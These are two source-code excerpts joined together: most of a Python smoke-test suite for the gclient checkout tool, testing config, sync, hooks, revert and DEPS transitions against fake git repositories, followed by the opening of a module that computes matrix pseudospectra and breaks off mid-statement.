If untangle is True, tries to sort out the output from parallel checkout."""
(stdout, stderr, returncode) = self.gclient(cmd)
if untangle:
stdout = self.untangle(stdout)
self.checkString(expected_stderr, stderr)
self.assertEquals(0, returncode)
return self.checkBlock(stdout, items)
def splitBlock(self, stdout):
"""Split gclient's output into logical execution blocks.
___ running 'foo' at '/bar'
(...)
___ running 'baz' at '/bar'
(...)
will result in 2 items of len((...).splitlines()) each.
"""
results = []
for line in stdout.splitlines(False):
# Intentionally skips empty lines.
if not line:
continue
if line.startswith('__'):
match = re.match(r'^________ ([a-z]+) \'(.*)\' in \'(.*)\'$', line)
if not match:
match = re.match(r'^_____ (.*) is missing, synching instead$', line)
if match:
# Blah, it's when a dependency is deleted, we should probably not
# output this message.
results.append([line])
elif (
not re.match(
r'_____ [^ ]+ : Attempting rebase onto [0-9a-f]+...',
line) and
not re.match(r'_____ [^ ]+ at [^ ]+', line)):
# The two regexp above are a bit too broad, they are necessary only
# for git checkouts.
self.fail(line)
else:
results.append([[match.group(1), match.group(2), match.group(3)]])
else:
if not results:
# TODO(maruel): gclient's git stdout is inconsistent.
# This should fail the test instead!!
pass
else:
results[-1].append(line)
return results
def checkBlock(self, stdout, items):
results = self.splitBlock(stdout)
for i in xrange(min(len(results), len(items))):
if isinstance(items[i], (list, tuple)):
verb = items[i][0]
path = items[i][1]
else:
verb = items[i]
path = self.root_dir
self.checkString(results[i][0][0], verb, (i, results[i][0][0], verb))
if sys.platform == 'win32':
# Make path lower case since casing can change randomly.
self.checkString(
results[i][0][2].lower(),
path.lower(),
(i, results[i][0][2].lower(), path.lower()))
else:
self.checkString(results[i][0][2], path, (i, results[i][0][2], path))
self.assertEquals(len(results), len(items), (stdout, items, len(results)))
return results
@staticmethod
def svnBlockCleanup(out):
"""Work around svn status difference between svn 1.5 and svn 1.6
I don't know why but on Windows they are reversed. So sorts the items."""
for i in xrange(len(out)):
if len(out[i]) < 2:
continue
out[i] = [out[i][0]] + sorted([x[1:].strip() for x in out[i][1:]])
return out
class GClientSmoke(GClientSmokeBase):
"""Doesn't require either svnserve nor git-daemon."""
@property
def svn_base(self):
return 'svn://random.server/svn/'
@property
def git_base(self):
return 'git://random.server/git/'
def testHelp(self):
"""testHelp: make sure no new command was added."""
result = self.gclient(['help'])
# Roughly, not too short, not too long.
self.assertTrue(1000 < len(result[0]) and len(result[0]) < 2300,
'Too much written to stdout: %d bytes' % len(result[0]))
self.assertEquals(0, len(result[1]))
self.assertEquals(0, result[2])
def testUnknown(self):
result = self.gclient(['foo'])
# Roughly, not too short, not too long.
self.assertTrue(1000 < len(result[0]) and len(result[0]) < 2300,
'Too much written to stdout: %d bytes' % len(result[0]))
self.assertEquals(0, len(result[1]))
self.assertEquals(0, result[2])
def testNotConfigured(self):
res = ('', 'Error: client not configured; see \'gclient config\'\n', 1)
self.check(res, self.gclient(['cleanup']))
self.check(res, self.gclient(['diff']))
self.check(res, self.gclient(['pack']))
self.check(res, self.gclient(['revert']))
self.check(res, self.gclient(['revinfo']))
self.check(res, self.gclient(['runhooks']))
self.check(res, self.gclient(['status']))
self.check(res, self.gclient(['sync']))
self.check(res, self.gclient(['update']))
def testConfig(self):
p = join(self.root_dir, '.gclient')
def test(cmd, expected):
if os.path.exists(p):
os.remove(p)
results = self.gclient(cmd)
self.check(('', '', 0), results)
self.checkString(expected, open(p, 'rU').read())
test(['config', self.svn_base + 'trunk/src/'],
('solutions = [\n'
' { "name" : "src",\n'
' "url" : "%strunk/src",\n'
' "deps_file" : "DEPS",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n'
'cache_dir = None\n') % self.svn_base)
test(['config', self.git_base + 'repo_1', '--name', 'src'],
('solutions = [\n'
' { "name" : "src",\n'
' "url" : "%srepo_1",\n'
' "deps_file" : "DEPS",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n'
'cache_dir = None\n') % self.git_base)
test(['config', 'foo', 'faa'],
'solutions = [\n'
' { "name" : "foo",\n'
' "url" : "foo",\n'
' "deps_file" : "DEPS",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "faa",\n'
' },\n'
']\n'
'cache_dir = None\n')
test(['config', 'foo', '--deps', 'blah'],
'solutions = [\n'
' { "name" : "foo",\n'
' "url" : "foo",\n'
' "deps_file" : "blah",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n'
'cache_dir = None\n')
test(['config', '--spec', '["blah blah"]'], '["blah blah"]')
os.remove(p)
results = self.gclient(['config', 'foo', 'faa', 'fuu'])
err = ('Usage: gclient.py config [options] [url] [safesync url]\n\n'
'gclient.py: error: Inconsistent arguments. Use either --spec or one'
' or 2 args\n')
self.check(('', err, 2), results)
self.assertFalse(os.path.exists(join(self.root_dir, '.gclient')))
def testSolutionNone(self):
results = self.gclient(['config', '--spec',
'solutions=[{"name": "./", "url": None}]'])
self.check(('', '', 0), results)
results = self.gclient(['sync'])
self.check(('', '', 0), results)
self.assertTree({})
results = self.gclient(['revinfo'])
self.check(('./: None\n', '', 0), results)
self.check(('', '', 0), self.gclient(['cleanup']))
self.check(('', '', 0), self.gclient(['diff']))
self.assertTree({})
self.check(('', '', 0), self.gclient(['pack']))
self.check(('', '', 0), self.gclient(['revert']))
self.assertTree({})
self.check(('', '', 0), self.gclient(['runhooks']))
self.assertTree({})
self.check(('', '', 0), self.gclient(['status']))
def testDifferentTopLevelDirectory(self):
# Check that even if the .gclient file does not mention the directory src
# itself, but it is included via dependencies, the .gclient file is used.
self.gclient(['config', self.svn_base + 'trunk/src.DEPS'])
deps = join(self.root_dir, 'src.DEPS')
os.mkdir(deps)
write(join(deps, 'DEPS'),
'deps = { "src": "%strunk/src" }' % (self.svn_base))
src = join(self.root_dir, 'src')
os.mkdir(src)
res = self.gclient(['status', '--jobs', '1'], src)
self.checkBlock(res[0], [('running', deps), ('running', src)])
class GClientSmokeGIT(GClientSmokeBase):
def setUp(self):
super(GClientSmokeGIT, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_git()
def testSync(self):
if not self.enabled:
return
# TODO(maruel): safesync.
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
# Test unversioned checkout.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
# TODO(maruel): http://crosbug.com/3582 hooks run even if not matching, must
# add sync parsing to get the list of updated files.
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Manually remove git_hooked1 before synching to make sure it's not
# recreated.
os.remove(join(self.root_dir, 'src', 'git_hooked1'))
# Test incremental versioned sync: sync backward.
self.parseGclient(
['sync', '--jobs', '1', '--revision',
'src@' + self.githash('repo_1', 1),
'--deps', 'mac', '--delete_unversioned_trees'],
['deleting'])
tree = self.mangle_git_tree(('repo_1@1', 'src'),
('repo_2@2', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Test incremental sync: delete-unversioned_trees isn't there.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_3@2', 'src/repo2/repo_renamed'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testSyncIgnoredSolutionName(self):
"""TODO(maruel): This will become an error soon."""
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1',
'--revision', 'invalid@' + self.githash('repo_1', 1)],
['running', 'running'],
'Please fix your script, having invalid --revision flags '
'will soon considered an error.\n')
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testSyncNoSolutionName(self):
if not self.enabled:
return
# When no solution name is provided, gclient uses the first solution listed.
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1',
'--revision', self.githash('repo_1', 1)],
[])
tree = self.mangle_git_tree(('repo_1@1', 'src'),
('repo_2@2', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_4@2', 'src/repo4'))
self.assertTree(tree)
def testSyncJobs(self):
if not self.enabled:
return
# TODO(maruel): safesync.
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
# Test unversioned checkout.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '8'],
['running', 'running'],
untangle=True)
# TODO(maruel): http://crosbug.com/3582 hooks run even if not matching, must
# add sync parsing to get the list of updated files.
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Manually remove git_hooked1 before synching to make sure it's not
# recreated.
os.remove(join(self.root_dir, 'src', 'git_hooked1'))
# Test incremental versioned sync: sync backward.
# Use --jobs 1 otherwise the order is not deterministic.
self.parseGclient(
['sync', '--revision', 'src@' + self.githash('repo_1', 1),
'--deps', 'mac', '--delete_unversioned_trees', '--jobs', '1'],
['deleting'],
untangle=True)
tree = self.mangle_git_tree(('repo_1@1', 'src'),
('repo_2@2', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Test incremental sync: delete-unversioned_trees isn't there.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '8'],
['running', 'running'],
untangle=True)
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_3@2', 'src/repo2/repo_renamed'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testRunHooks(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.gclient(['sync', '--deps', 'mac'])
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
os.remove(join(self.root_dir, 'src', 'git_hooked1'))
os.remove(join(self.root_dir, 'src', 'git_hooked2'))
# runhooks runs all hooks even if not matching by design.
out = self.parseGclient(['runhooks', '--deps', 'mac'],
['running', 'running'])
self.assertEquals(1, len(out[0]))
self.assertEquals(1, len(out[1]))
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testPreDepsHooks(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_5', '--name', 'src'])
expectation = [
('running', self.root_dir), # pre-deps hook
]
out = self.parseGclient(['sync', '--deps', 'mac', '--jobs=1',
'--revision', 'src@' + self.githash('repo_5', 2)],
expectation)
self.assertEquals(2, len(out[0]))
self.assertEquals('pre-deps hook', out[0][1])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
tree['src/git_pre_deps_hooked'] = 'git_pre_deps_hooked'
self.assertTree(tree)
os.remove(join(self.root_dir, 'src', 'git_pre_deps_hooked'))
# Pre-DEPS hooks don't run with runhooks.
self.gclient(['runhooks', '--deps', 'mac'])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
self.assertTree(tree)
# Pre-DEPS hooks run when syncing with --nohooks.
self.gclient(['sync', '--deps', 'mac', '--nohooks',
'--revision', 'src@' + self.githash('repo_5', 2)])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
tree['src/git_pre_deps_hooked'] = 'git_pre_deps_hooked'
self.assertTree(tree)
os.remove(join(self.root_dir, 'src', 'git_pre_deps_hooked'))
# Pre-DEPS hooks don't run with --noprehooks
self.gclient(['sync', '--deps', 'mac', '--noprehooks',
'--revision', 'src@' + self.githash('repo_5', 2)])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
self.assertTree(tree)
def testPreDepsHooksError(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_5', '--name', 'src'])
expectated_stdout = [
('running', self.root_dir), # pre-deps hook
('running', self.root_dir), # pre-deps hook (fails)
]
expected_stderr = ("Error: Command '/usr/bin/python -c import sys; "
"sys.exit(1)' returned non-zero exit status 1 in %s\n"
% self.root_dir)
stdout, stderr, retcode = self.gclient(['sync', '--deps', 'mac', '--jobs=1',
'--revision',
'src@' + self.githash('repo_5', 3)])
self.assertEquals(stderr, expected_stderr)
self.assertEquals(2, retcode)
self.checkBlock(stdout, expectated_stdout)
def testRevInfo(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.gclient(['sync', '--deps', 'mac'])
results = self.gclient(['revinfo', '--deps', 'mac'])
out = ('src: %(base)srepo_1\n'
'src/repo2: %(base)srepo_2@%(hash2)s\n'
'src/repo2/repo_renamed: %(base)srepo_3\n' %
{
'base': self.git_base,
'hash2': self.githash('repo_2', 1)[:7],
})
self.check((out, '', 0), results)
results = self.gclient(['revinfo', '--deps', 'mac', '--actual'])
out = ('src: %(base)srepo_1@%(hash1)s\n'
'src/repo2: %(base)srepo_2@%(hash2)s\n'
'src/repo2/repo_renamed: %(base)srepo_3@%(hash3)s\n' %
{
'base': self.git_base,
'hash1': self.githash('repo_1', 2),
'hash2': self.githash('repo_2', 1),
'hash3': self.githash('repo_3', 2),
})
self.check((out, '', 0), results)
class GClientSmokeGITMutates(GClientSmokeBase):
"""testRevertAndStatus mutates the git repo so move it to its own suite."""
def setUp(self):
super(GClientSmokeGITMutates, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_git()
def testRevertAndStatus(self):
if not self.enabled:
return
# Commit new change to repo to make repo_2's hash use a custom_var.
cur_deps = self.FAKE_REPOS.git_hashes['repo_1'][-1][1]['DEPS']
repo_2_hash = self.FAKE_REPOS.git_hashes['repo_2'][1][0][:7]
new_deps = cur_deps.replace('repo_2@%s\'' % repo_2_hash,
'repo_2@\' + Var(\'r2hash\')')
new_deps = 'vars = {\'r2hash\': \'%s\'}\n%s' % (repo_2_hash, new_deps)
self.FAKE_REPOS._commit_git('repo_1', { # pylint: disable=W0212
'DEPS': new_deps,
'origin': 'git/repo_1@3\n',
})
config_template = (
"""solutions = [{
"name" : "src",
"url" : "%(git_base)srepo_1",
"deps_file" : "DEPS",
"managed" : True,
"custom_vars" : %(custom_vars)s,
}]""")
self.gclient(['config', '--spec', config_template % {
'git_base': self.git_base,
'custom_vars': {}
}])
# Tested in testSync.
self.gclient(['sync', '--deps', 'mac'])
write(join(self.root_dir, 'src', 'repo2', 'hi'), 'Hey!')
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'], [])
# TODO(maruel): http://crosbug.com/3584 It should output the unversioned
# files.
self.assertEquals(0, len(out))
# Revert implies --force implies running hooks without looking at pattern
# matching. For each expected path, 'git reset' and 'git clean' are run, so
# there should be two results for each. The last two results should reflect
# writing git_hooked1 and git_hooked2. There's only one result for the third
# because it is clean and has no output for 'git clean'.
out = self.parseGclient(['revert', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
self.assertEquals(2, len(out))
tree = self.mangle_git_tree(('repo_1@3', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Make a new commit object in the origin repo, to force reset to fetch.
self.FAKE_REPOS._commit_git('repo_2', { # pylint: disable=W0212
'origin': 'git/repo_2@3\n',
})
self.gclient(['config', '--spec', config_template % {
'git_base': self.git_base,
'custom_vars': {'r2hash': self.FAKE_REPOS.git_hashes['repo_2'][-1][0] }
}])
out = self.parseGclient(['revert', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
self.assertEquals(2, len(out))
tree = self.mangle_git_tree(('repo_1@3', 'src'),
('repo_2@3', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
results = self.gclient(['status', '--deps', 'mac', '--jobs', '1'])
out = results[0].splitlines(False)
# TODO(maruel): http://crosbug.com/3584 It should output the unversioned
# files.
self.assertEquals(0, len(out))
def testSyncNoHistory(self):
if not self.enabled:
return
# Create an extra commit in repo_2 and point DEPS to its hash.
cur_deps = self.FAKE_REPOS.git_hashes['repo_1'][-1][1]['DEPS']
repo_2_hash_old = self.FAKE_REPOS.git_hashes['repo_2'][1][0][:7]
self.FAKE_REPOS._commit_git('repo_2', { # pylint: disable=W0212
'last_file': 'file created in last commit',
})
repo_2_hash_new = self.FAKE_REPOS.git_hashes['repo_2'][-1][0]
new_deps = cur_deps.replace(repo_2_hash_old, repo_2_hash_new)
self.assertNotEqual(new_deps, cur_deps)
self.FAKE_REPOS._commit_git('repo_1', { # pylint: disable=W0212
'DEPS': new_deps,
'origin': 'git/repo_1@4\n',
})
config_template = (
"""solutions = [{
"name" : "src",
"url" : "%(git_base)srepo_1",
"deps_file" : "DEPS",
"managed" : True,
}]""")
self.gclient(['config', '--spec', config_template % {
'git_base': self.git_base
}])
self.gclient(['sync', '--no-history', '--deps', 'mac'])
repo2_root = join(self.root_dir, 'src', 'repo2')
# Check that repo_2 is actually shallow and its log has only one entry.
rev_lists = subprocess2.check_output(['git', 'rev-list', 'HEAD'],
cwd=repo2_root)
self.assertEquals(repo_2_hash_new, rev_lists.strip('\r\n'))
# Check that we have actually checked out the right commit.
self.assertTrue(os.path.exists(join(repo2_root, 'last_file')))
class SkiaDEPSTransitionSmokeTest(GClientSmokeBase):
"""Simulate the behavior of bisect bots as they transition across the Skia
DEPS change."""
FAKE_REPOS_CLASS = fake_repos.FakeRepoSkiaDEPS
def setUp(self):
super(SkiaDEPSTransitionSmokeTest, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_git()
def testSkiaDEPSChangeGit(self):
if not self.enabled:
return
# Create an initial checkout:
# - Single checkout at the root.
# - Multiple checkouts in a shared subdirectory.
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.git_base + 'repo_2",'
'}]'])
checkout_path = os.path.join(self.root_dir, 'src')
skia = os.path.join(checkout_path, 'third_party', 'skia')
skia_gyp = os.path.join(skia, 'gyp')
skia_include = os.path.join(skia, 'include')
skia_src = os.path.join(skia, 'src')
gyp_git_url = self.git_base + 'repo_3'
include_git_url = self.git_base + 'repo_4'
src_git_url = self.git_base + 'repo_5'
skia_git_url = self.FAKE_REPOS.git_base + 'repo_1'
pre_hash = self.githash('repo_2', 1)
post_hash = self.githash('repo_2', 2)
# Initial sync. Verify that we get the expected checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % pre_hash])
self.assertEqual(res[2], 0, 'Initial sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_gyp), gyp_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_include), include_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_src), src_git_url)
# Verify that the sync succeeds. Verify that we have the expected merged
# checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % post_hash])
self.assertEqual(res[2], 0, 'DEPS change sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia), skia_git_url)
# Sync again. Verify that we still have the expected merged checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % post_hash])
self.assertEqual(res[2], 0, 'Subsequent sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia), skia_git_url)
# Sync back to the original DEPS. Verify that we get the original structure.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % pre_hash])
self.assertEqual(res[2], 0, 'Reverse sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_gyp), gyp_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_include), include_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_src), src_git_url)
# Sync again. Verify that we still have the original structure.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % pre_hash])
self.assertEqual(res[2], 0, 'Subsequent sync #2 failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_gyp), gyp_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_include), include_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_src), src_git_url)
class BlinkDEPSTransitionSmokeTest(GClientSmokeBase):
"""Simulate the behavior of bisect bots as they transition across the Blink
DEPS change."""
FAKE_REPOS_CLASS = fake_repos.FakeRepoBlinkDEPS
def setUp(self):
super(BlinkDEPSTransitionSmokeTest, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_git()
self.checkout_path = os.path.join(self.root_dir, 'src')
self.blink = os.path.join(self.checkout_path, 'third_party', 'WebKit')
self.blink_git_url = self.FAKE_REPOS.git_base + 'repo_2'
self.pre_merge_sha = self.githash('repo_1', 1)
self.post_merge_sha = self.githash('repo_1', 2)
def CheckStatusPreMergePoint(self):
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
self.blink), self.blink_git_url)
self.assertTrue(os.path.exists(join(self.blink, '.git')))
self.assertTrue(os.path.exists(join(self.blink, 'OWNERS')))
with open(join(self.blink, 'OWNERS')) as f:
owners_content = f.read()
self.assertEqual('OWNERS-pre', owners_content, 'OWNERS not updated')
self.assertTrue(os.path.exists(join(self.blink, 'Source', 'exists_always')))
self.assertTrue(os.path.exists(
join(self.blink, 'Source', 'exists_before_but_not_after')))
self.assertFalse(os.path.exists(
join(self.blink, 'Source', 'exists_after_but_not_before')))
def CheckStatusPostMergePoint(self):
# Check that the contents still exists
self.assertTrue(os.path.exists(join(self.blink, 'OWNERS')))
with open(join(self.blink, 'OWNERS')) as f:
owners_content = f.read()
self.assertEqual('OWNERS-post', owners_content, 'OWNERS not updated')
self.assertTrue(os.path.exists(join(self.blink, 'Source', 'exists_always')))
# Check that file removed between the branch point are actually deleted.
self.assertTrue(os.path.exists(
join(self.blink, 'Source', 'exists_after_but_not_before')))
self.assertFalse(os.path.exists(
join(self.blink, 'Source', 'exists_before_but_not_after')))
# But not the .git folder
self.assertFalse(os.path.exists(join(self.blink, '.git')))
@unittest.skip('flaky')
def testBlinkDEPSChangeUsingGclient(self):
"""Checks that {src,blink} repos are consistent when syncing going back and
forth using gclient sync src@revision."""
if not self.enabled:
return
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.git_base + 'repo_1",'
'}]'])
# Go back and forth two times.
for _ in xrange(2):
res = self.gclient(['sync', '--jobs', '1',
'--revision', 'src@%s' % self.pre_merge_sha])
self.assertEqual(res[2], 0, 'DEPS change sync failed.')
self.CheckStatusPreMergePoint()
res = self.gclient(['sync', '--jobs', '1',
'--revision', 'src@%s' % self.post_merge_sha])
self.assertEqual(res[2], 0, 'DEPS change sync failed.')
self.CheckStatusPostMergePoint()
@unittest.skip('flaky')
def testBlinkDEPSChangeUsingGit(self):
"""Like testBlinkDEPSChangeUsingGclient, but move the main project using
directly git and not gclient sync."""
if not self.enabled:
return
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.git_base + 'repo_1",'
' "managed": False,'
'}]'])
# Perform an initial sync to bootstrap the repo.
res = self.gclient(['sync', '--jobs', '1'])
self.assertEqual(res[2], 0, 'Initial gclient sync failed.')
# Go back and forth two times.
for _ in xrange(2):
subprocess2.check_call(['git', 'checkout', '-q', self.pre_merge_sha],
cwd=self.checkout_path)
res = self.gclient(['sync', '--jobs', '1'])
self.assertEqual(res[2], 0, 'gclient sync failed.')
self.CheckStatusPreMergePoint()
subprocess2.check_call(['git', 'checkout', '-q', self.post_merge_sha],
cwd=self.checkout_path)
res = self.gclient(['sync', '--jobs', '1'])
self.assertEqual(res[2], 0, 'DEPS change sync failed.')
self.CheckStatusPostMergePoint()
@unittest.skip('flaky')
def testBlinkLocalBranchesArePreserved(self):
"""Checks that the state of local git branches are effectively preserved
when going back and forth."""
if not self.enabled:
return
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.git_base + 'repo_1",'
'}]'])
# Initialize to pre-merge point.
self.gclient(['sync', '--revision', 'src@%s' % self.pre_merge_sha])
self.CheckStatusPreMergePoint()
# Create a branch named "foo".
subprocess2.check_call(['git', 'checkout', '-qB', 'foo'],
cwd=self.blink)
# Cross the pre-merge point.
self.gclient(['sync', '--revision', 'src@%s' % self.post_merge_sha])
self.CheckStatusPostMergePoint()
# Go backwards and check that we still have the foo branch.
self.gclient(['sync', '--revision', 'src@%s' % self.pre_merge_sha])
self.CheckStatusPreMergePoint()
subprocess2.check_call(
['git', 'show-ref', '-q', '--verify', 'refs/heads/foo'], cwd=self.blink)
if __name__ == '__main__':
if '-v' in sys.argv:
logging.basicConfig(level=logging.DEBUG)
if '-c' in sys.argv:
COVERAGE = True
sys.argv.remove('-c')
if os.path.exists('.coverage'):
os.remove('.coverage')
os.environ['COVERAGE_FILE'] = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'.coverage')
unittest.main()
|
|
'''
Parallel computation of pseudospecta of a square matrix by its definition.
Author: Dmitry E. Kislov
E-mail: kislov@easydan.com
Date: 25 Nov. 2015
'''
from __future__ import print_function
import multiprocessing
import warnings
import numpy as np
import itertools
__all__ = ['gersgorin_bounds', 'pseudo', 'eigen_bounds']
def gersgorin_bounds(A):
'''Localize eigenvalues of a matrix in a complex plane.
The function uses well known S.A. Gersgorin (1931) theorem about
matrix eigenvalues localization: the eigenvalues lie in the closed region
of the complex plane consisting of all the rings:
:param A: the input matrix as a ``numpy.array`` or 2D list with ``A.shape==(n, m)``.
For rectangular matrices bounding box is computed for the largest square submatrix with shape min(n,m) x min(n,m).
.. math::
|z-a_{kk}|\leq R_k - |a_{kk}|, R_k=\sum\limits_{i=1}^n|a_{ki}|
'''
n, m = np.shape(A)
if n <= m:
B = A[:n, :n]
else:
B = A[:m, :m]
n = m
_A = np.abs(B)
Rk = np.sum(_A, axis=1)
radii = [Rk[k] - _A[k, k] for k in range(n)]
rbounds = [B[k, k].real - radii[k] for k in range(n)]
rbounds.extend([B[k, k].real + radii[k] for k in range(n)])
cbounds = [B[k, k].imag - radii[k] for k in range(n)]
cbounds.extend([B[k, k].imag + radii[k] for k in range(n)])
return [np.min(rbounds), np.max(rbounds), np.min(cbounds), np.max(cbounds)]
def eigen_bounds(A, percent=0.1):
'''Build pseudospectra bounds on matrix eigenvalues
:param A: the input matrix as a ``numpy.array`` or 2D list with ``A.shape==(n, m)``.
For rectangular matrices bounding box is computed for the largest square
submatrix with shape min(n,m) x min(n,m).
:param percent: an indent for bounding box construction (default is 0.1).
Bound values are computed as extreme egienvalues +/- percent*residual,
where residual is a maximal distance between all possible
pairs of eigenvalues.
'''
n, m = np.shape(A)
if n <= m:
B = A[:n, :n]
else:
B = A[:m, :m]
eigvals = np.linalg.eigvals(B)
reals = np.real(eigvals)
imags = np.imag(eigvals)
lbr = np.min(reals)
ubr = np.max(reals)
lbc = np.min(imags)
ubc = np.max(imags)
residual = np.max([abs(x-y) for x, y in itertools.combinations(eigvals, 2)])
return [lbr-percent*residual,
ubr+percent*residual,
lbc-percent*residual,
ubc+percent*residual]
def _safe_bbox(bbox, A):
'''converts bbox array to the array of type [float, float, float, float].
'''
assert len(bbox) >= 4, "Length of bbox should be equal or greater 4."
try:
res = [float(bbox[i]) for i in range(4)]
except (TypeError, ValueError):
warnings.warn('Invalid bbox-array. Gershgorin circles will be used.',
RuntimeWarning)
res = gersgorin_bounds(A)
return res
def _calc_pseudo(A, x, y, n, m):
def ff(x, y): return np.linalg.svd((x+(1j)*y)*np.eye(n, m) - A,
compute_uv=False)[-1]
return [ff(_x, _y) for _x, _y in zip(x, y)]
def _pseudo_worker(*args):
digits = args[0][1]
result = None
if digits > 15:
try:
import mpmath as mp
mp.mp.dps = int(digits)
def ff(x, y): return np.float128(mp.svd(mp.matrix((x+(1j) * y) * np.eye(args[0][-2], args[0][-1]) - args[0][2]), compute_uv=False).tolist()[-1][0])
result = (args[0][0],
